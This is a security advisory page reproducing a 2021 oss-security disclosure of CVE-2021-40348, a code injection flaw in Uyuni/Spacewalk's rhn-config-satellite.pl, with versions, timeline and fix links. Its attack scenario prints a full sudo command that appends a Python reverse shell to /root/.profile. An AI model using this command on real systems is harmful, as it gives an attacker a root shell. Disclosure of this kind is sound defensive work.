Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-40348: security - spacewalk-admin: CVE-2021-40348: arbitrary local code execution by 'tomcat' user via rhn-config-satellite.pl

Spacewalk 2.10, and derivatives such as Uyuni 2021.08, allows code injection. rhn-config-satellite.pl doesn’t sanitize the configuration filename used to append Spacewalk-specific key-value pair. The script is intended to be run by the tomcat user account with Sudo, according to the installation setup. This can lead to the ability of an attacker to use --option to append arbitrary code to a root-owned file that eventually will be executed by the system. This is fixed in Uyuni spacewalk-admin 4.3.2-1.

CVE
Open in Source
#vulnerability#web#mac#windows#linux#git#php#perl#auth
  • Products
    • Openwall GNU/*/Linux server OS
    • Linux Kernel Runtime Guard
    • John the Ripper password cracker
      • Free & Open Source for any platform
      • in the cloud
      • Pro for Linux
      • Pro for macOS
    • Wordlists for password cracking
    • passwdqc policy enforcement
      • Free & Open Source for Unix
      • Pro for Windows (Active Directory)
    • yescrypt KDF & password hashing
    • yespower Proof-of-Work (PoW)
    • crypt_blowfish password hashing
    • phpass ditto in PHP
    • tcb better password shadowing
    • Pluggable Authentication Modules
    • scanlogd port scan detector
    • popa3d tiny POP3 daemon
    • blists web interface to mailing lists
    • msulogin single user mode login
    • php_mt_seed mt_rand() cracker
  • Services
  • Publications
    • Articles
    • Presentations
  • Resources
    • Mailing lists
    • Community wiki
    • Source code repositories (GitHub)
    • Source code repositories (CVSweb)
    • File archive & mirrors
    • How to verify digital signatures
    • OVE IDs
  • What’s new

[<prev] [next>] [day] [month] [year] [list]

Date: Thu, 28 Oct 2021 15:43:23 +0200 From: Paolo Perego <paolo.perego@…e.com> To: oss-security@…ts.openwall.com Subject: spacewalk-admin: CVE-2021-40348: arbitrary local code execution by ‘tomcat’ user via rhn-config-satellite.pl

Description

Hello list, during an internal audit a vulnerability was found in a perl script from the uyuni[1] component (previously known as spacewalk[2], discontinued on March 31st 2020). Uyuni is a configuration and infrastructure management tool helping sysadmin’s in their tasks over a huge multitude of assets.

The rhn-config-satellite.pl script is intended to be run by the ‘tomcat’ user using sudo without any password, to adjust Uyuni configuration.

Due to a missing sanitization of the filename that can be used as config file, a rogue ‘tomcat’ user can append arbitrary code to any files that eventually will be executed later on by higher privileged users.

Please consider the following attack scenario. An attacker gains ‘tomcat’ user on the victim server. Rogue ‘tomcat’ executes the following command:

sudo /usr/bin/rhn-config-satellite.pl --target=/root/.profile –option="export RHOST=\"192.168.122.1\";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'"

The python code implementing a reverse shell is then appended to the /root/.profile file and executed everytime root logs in. This results in having arbitrary code execution with superuser privileges on the victim system.

Affected versions

This vulnerability was fixed in spacewalk-admin version 4.3.2-1 [3] (by this commit on upstream [4]). All spacewalk-admin versions before 4.3.2-1 are vulnerable

Timeline:

2021-08-30: vulnerability was reported to upstream authors

2021-08-31: upstream authors acknowledge the vulnerability start working on the fix.

2021-08-31: received CVE from Mitre and offered authors an embargo until 2021-10-27

2021-10-27: authors published fixes for a product containing spacewalk as component

2021-10-28: authors published fixes in upstream repository and publication of findings

[1] https://github.com/uyuni-project/uyuni

[2] https://github.com/spacewalkproject/spacewalk

[3] https://github.com/uyuni-project/uyuni/releases/tag/spacewalk-admin-4.3.2-1 [4] https://github.com/uyuni-project/uyuni/commit/790c7388efac6923c5475e01c1ff718dffa9f052

https://bugzilla.suse.com/show_bug.cgi?id=1190040

(*_ Paolo Perego @thesp0nge

//\ Software security engineer suse.com

V_/_ 0A1A 2003 9AE0 B09C 51A4 7ACD FC0D CEA6 0806 294B

– (*_ Paolo Perego @thesp0nge //\ Software security engineer suse.com V_/_ 0A1A 2003 9AE0 B09C 51A4 7ACD FC0D CEA6 0806 294B

Download attachment "OpenPGP_0xFC0DCEA60806294B.asc" of type "application/pgp-keys" (4749 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE